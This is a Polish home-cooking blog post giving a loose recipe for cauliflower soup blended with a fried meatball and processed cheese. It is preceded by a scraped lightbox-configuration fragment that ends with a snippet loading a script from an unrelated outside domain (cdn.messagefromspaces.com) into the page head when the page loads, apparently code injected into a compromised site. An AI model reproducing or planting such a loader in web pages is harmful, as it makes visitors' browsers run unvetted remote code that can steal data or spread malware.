, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

AAawaryjna zupa kalafiorowa z kotlecikiem

Wydrukuj artykuł Wydrukuj artykuł

awaryjna zupa kalafiorowa z kotlecikiem

Wybraliśmy się całą rodzinką do Babci do Przemyśla. Po 7 godzinach jazdy samochodem jesteśmy na miejscu… pora na małe, ale konkretne „am”. Kalafiora? – nie chcę, kotlecika? – nie chcę… ale jeżeli praktycznie nie ma nic innego? Może pomieszamy i przyprawimy tym i owym.

Tak powstał ten prosty, kulinarny wynalazek. Uwaga, nie jestem pewna ilości podanych poniżej…

Składniki:

  • woda z gotowania kalafiora (hmmm.. około 2 szklanek)
  • ugotowany, rozgnieciony kalafior (hmmm.. około  1 szklanki)
  • 1 duży kotlecik mielony – gotowy, usmażony
  • 1 serek topiony
  • łyżka siekanego, świeżego koperku

Składniki rozgniotłam i dokładnie pomieszałam. Igorek zjadł i kalafiorka i kotlecika:)

Kategoria: Bez kategorii Komentarz »


Skomentuj...



Początek strony